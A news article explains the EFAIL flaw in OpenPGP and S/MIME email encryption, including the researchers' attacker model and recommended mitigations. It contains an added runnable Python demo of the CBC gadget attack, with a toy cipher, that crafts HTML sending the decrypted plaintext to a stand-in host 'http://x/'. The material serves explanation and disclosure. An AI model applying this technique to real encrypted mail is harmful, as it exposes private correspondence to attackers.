A threatening flaw in email encryption was revealed Monday in a report from European researchers. If some sources are to be believed, it could spell the end of email as a secure channel.
The new vulnerability is called EFAIL. It exposes the plaintext of encrypted emails for users of OpenPGP (the open standard descended from Pretty Good Privacy) and S/MIME (Secure/Multipurpose Internet Mail Extensions), the two most
prominent standards for end-to-end encryption of email, according to the researchers' report and an advisory from the Electronic Frontier Foundation (EFF).
The paper describes the attacks in terms of an attacker model rather than observed real-world abuse, so it is unclear whether harm
has actually occurred. But the authors state that they have “disclosed the vulnerabilities to all affected email vendors, and to national CERTs and our findings were confirmed by these
bodies.”
They go on to say that in their model, the attacker is able to collect end-to-end encrypted emails, either through a man-in-the-middle attack on the network, by accessing an SMTP
server, by accessing the IMAP account on the server, or by some other means. “He may store these emails for some time before he starts his attack.”
Collecting ciphertext in this way is a realistic assumption, they add, because transport encryption between mail servers does not protect stored mail.
“While transport security between mail servers is useful against some attacker scenarios, it does not offer reliable security
guarantees regarding confidentiality and authenticity of emails,” the researchers state.
It is, for example, not enough to deter attacks by “nation state actors, large-scale
breaches of email servers, revealing millions of email messages, or attackers compromising email accounts,” they explain.
In this scenario, attackers send a “changed encrypted email” to the victim. The victim's email client decrypts the email and loads external content, “thus exfiltrating the plaintext to the attacker.”
The researchers used CBC/CFB gadgets (malleability tricks against the cipher modes used by S/MIME and OpenPGP respectively) “to inject malicious plaintext snippets into encrypted emails that abuse existing and standard conforming backchannels, for example, in HTML, CSS, or X.509
functionality, to exfiltrate the full plaintext after decryption.”
They add that EFAIL “abuses active content of HTML emails, for example externally loaded images or styles, to
exfiltrate plaintext through requested URLs.”
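The following is an added worked example of the CBC gadget technique described above; it is not the researchers' code. A toy hash-based Feistel block cipher stands in for AES (the gadget only depends on CBC mode, not on the cipher), the attacker host "x" is hypothetical, and the message text is constructed for the demo. The attacker has no key: only the ciphertext and the knowledge that an S/MIME body starts with a predictable Content-Type header.

```python
# Added example: EFAIL-style CBC gadget attack on a mail client that renders
# decrypted HTML. Not the researchers' code. The block cipher is a toy
# hash-based Feistel network standing in for AES; the attacker host "x" is
# hypothetical; the message content is constructed for this demo.
import hashlib
import os
import re

BLOCK = 16


def xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))


def _f(key, rnd, half):
    # Round function: keyed hash of one half of the block (toy, not AES).
    return hashlib.sha256(key + bytes([rnd]) + half).digest()[:8]


def block_encrypt(key, block):
    l, r = block[:8], block[8:]
    for rnd in range(8):
        l, r = r, xor(l, _f(key, rnd, r))
    return r + l


def block_decrypt(key, block):
    r, l = block[:8], block[8:]
    for rnd in reversed(range(8)):
        r, l = l, xor(r, _f(key, rnd, l))
    return l + r


def pkcs7_pad(data):
    n = BLOCK - len(data) % BLOCK
    return data + bytes([n]) * n


def pkcs7_unpad(data):
    n = data[-1]
    if not 1 <= n <= BLOCK or data[-n:] != bytes([n]) * n:
        raise ValueError("bad padding")
    return data[:-n]


def cbc_encrypt(key, iv, padded):
    out, prev = [], iv
    for i in range(0, len(padded), BLOCK):
        prev = block_encrypt(key, xor(padded[i:i + BLOCK], prev))
        out.append(prev)
    return iv + b"".join(out)


def cbc_decrypt_raw(key, ct):
    # Standard CBC: P_i = D(C_i) XOR C_{i-1}; block 0 is the IV.
    blocks = [ct[i:i + BLOCK] for i in range(0, len(ct), BLOCK)]
    return b"".join(xor(block_decrypt(key, cur), prev)
                    for prev, cur in zip(blocks, blocks[1:]))


def craft_efail_cbc(ct, known_p1):
    """Attacker side. D(C1) = P1 XOR IV, so the pair (X, C1) decrypts to
    (garbage, P1 XOR IV XOR X): pick X so the second block is any chosen
    16 bytes. C2..Cn still decrypt correctly whenever C1 precedes them."""
    iv, c1, rest = ct[:BLOCK], ct[BLOCK:2 * BLOCK], ct[2 * BLOCK:]
    mask = xor(known_p1, iv)

    def x_for(chosen):
        assert len(chosen) == BLOCK
        return xor(mask, chosen)

    open_tag = b'<img    ignore="'          # next garbage block lands in this attribute
    src_attr = b'" src="http://x/'          # victim plaintext becomes the URL path
    close_tag = b'">' + bytes([14]) * 14    # 14 x 0x0e is valid PKCS#7 padding
    return (x_for(open_tag) + c1      # X1 acts as IV: C1 -> open_tag
            + x_for(src_attr) + c1   # X2 -> garbage, C1 -> src_attr
            + rest                   # C2..Cn -> P2..Pn, the secret, unchanged
            + x_for(close_tag) + c1)  # X3 -> garbage, C1 -> close_tag + padding


def victim_client(key, ct):
    """Victim side: decrypts, then 'renders' by fetching the first <img src>.
    Returns the URL it would request, i.e. what leaks to the attacker."""
    html = pkcs7_unpad(cbc_decrypt_raw(key, ct))
    m = re.search(rb'src="([^"]*)"', html)
    return m.group(1) if m else None


SECRET = b"Meet at dock 9 at 23:00"                           # constructed
PLAINTEXT = b"Content-Type: text/html\r\n\r\n<p>" + SECRET + b"</p>"


def demo():
    key, iv = os.urandom(BLOCK), os.urandom(BLOCK)   # sender's secrets
    ct = cbc_encrypt(key, iv, pkcs7_pad(PLAINTEXT))
    assert victim_client(key, ct) is None             # honest mail fetches nothing
    crafted = craft_efail_cbc(ct, PLAINTEXT[:BLOCK])  # attacker knows only this prefix
    return victim_client(key, crafted)


if __name__ == "__main__":
    print(demo())
```

The garbage blocks are the price of each gadget: the attacker cannot predict them, which is why the real attack parks them inside attribute values and relies on lenient HTML parsers. Note also that the attacker controls the final block and so can supply valid padding, and that no integrity check ever fires, because CBC without a MAC (and OpenPGP's MDC, where clients ignore its failure) does not detect the edit.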
One of the researchers, Sebastian Schinzel, told Süddeutsche Zeitung that “email is no longer a secure communication
medium,” according to Gizmodo. It remains to be seen if this is overhype.
Meanwhile, the report suggests several strategies for preventing EFAIL attacks:
Short term: no decryption in the email client (decrypt messages in a separate application instead); disable HTML rendering.
Medium term: patching.
Long term: update the OpenPGP and S/MIME standards.
The report was authored by Damian Poddebniak, Christian Dresen, Jens Müller, Fabian Ising, Sebastian Schinzel, Simon Friedberger, Juraj Somorovsky and Jörg Schwenk.